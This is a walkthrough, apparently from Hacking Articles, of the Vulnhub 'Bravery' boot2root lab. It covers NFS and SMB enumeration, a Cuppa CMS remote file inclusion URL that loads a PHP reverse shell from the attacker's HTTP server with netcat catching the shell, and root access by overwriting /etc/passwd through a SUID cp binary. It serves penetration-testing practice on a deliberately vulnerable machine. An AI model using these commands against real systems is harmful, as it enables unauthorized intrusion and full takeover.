Categories

Archives

CTF Challenges

digitalworld.local-BRAVERY: Vulnhub Walkthrough

Today we will be solving a boot2root lab from Vulnhub called Bravery. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Penetration Methodologies

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Mount NFS share directory
  • SMB shared file enumeration

Exploiting

  • Abusing CMS via RFI
  • Obtaining reverse shell via netcat

Privilege Escalation

  • Abusing SUID binary
  • Capture the Flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So we have our target IP 192.168.1.105 now, let’s scan services and ports via nmap.

nmap -A 192.168.1.105

We got a fruitful result from nmap scan as we saw so many services were running on the various port.

Enumeration

We found network share service is available via port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.

showmount -e 192.168.1.105

we found /var/nfsshare is a shared directory that we can mount in our local machine as given below:

mkdir /tmp/raj
mount -t nfs 192.168.1.105:/var/nfsshare /tmp/raj
cd /tmp/raj
ls
cat discovery
cat enumeration
cat explore
cat password.txt
cat qwertyuioplkjhgfdsazxcvbnm

Hmmm!!! After exploring all files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be the password.

Because port 445 is also available for SMB, even we have also obtained a password recently thus we can try connecting to SMB to list shared folders. But first we need to enumerate SMB shared directory and for that, we can go with Enum4linux.

enum4linux 192.168.1.105

As you can observe, enum4linux showed two shared folders: anonymous and secured. And we can access them with the help of smb-client.

smbclient //192.168.1.105/anonymous
password: qwertyuioplkjhgfdsazxcvbnm

We have successfully accessed the shared folder “anonymous”, where I have seen some user’s folders. But while doing an internal recon, I didn’t notice any interesting clues.

So, I’m moving to another “secured” folder and here I found three files, which I downloaded on my local computer.

smbclient //192.168.1.105/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt

Then, each file opened, and some helpful URLs were found, we’re going to navigate them one by one, moreover, the last line was pitching for any CMS login.

Initially, we looked at the URL given below but that was no use to us.

//192.168.1.105/devlopmentsecretpage

We then explored another URL and found no useful stuff here, too.

//192.168.1.105/devops/directortestpagev1.php

At last we move to the third and final URL found from the genevieve.txt. Fortunately, I found the following web page differing from two previous results and it could have been CMS.

I found a Cuppa CMS login page by exploring other tabs. This might be a turning point as we are attempting to exploit CMS cuppa.

Exploiting

I dig out cuppa exploit from inside the searchsploit without wasting time and the CMS is vulnerable to LFI/RFI.

Thus, I found a Remote Inclusion File URL when I checked the POC. We now have to be prepared with a reverse shell for the exploitation of RFI.

Therefore, I used php-reverse-shell from inside /usr/share/webshell/php and modified the listening IP with Kali’s IP then launch Python HTTP server for file transferring and start netcat listener on listening port.

When everything is ready! Just trigger the following URL to exploit RFI.

//192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=//192.168.1.110:8000/shell.php?

We’ll get a netcat session for the victim’s machine as soon as we trigger the URL. Now we have a low privilege shell and we need to enhance privilege in order to achieve a higher privilege shell. Therefore, to find SUID enable binaries, I run the following command.

find / -perm -u=s -type f 2>/dev/null

Hmmm! So here I notice cp (copy command) has SUID permission that means I can copy any file as root. Now let’s try to escalate the privilege by exploiting SUID enable binary by copying our edited /etc/passwd file inside the victim’s machine.

Privilege Escalation

Suppose I would like to create a new user (raj) with root privilege inside /etc/password file of victim’s machine. So first we need to copy the content of /etc/passwd file in a text file inside our local machine and then with the help of OpenSSL generates the salt password for user raj and then copy the salt value.

Now open the text file where you have pasted the content of /etc/passwd of victim’s machine and add a new row for user raj along with the salt value that we have generated. Named the file as passwd and transfer this file into victim machine, so that we can replace our /etc/passwd file with original /etc/passwd file of the VM.

For downloading /etc/passwd file into Victim’s machine, execute the following command and get the root access to grab the flag.

cd /tmp
wget //192.168.1.110:8000/passwd
cp passwd /etc/passwd
su raj
cd /root
ls
cat proof.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here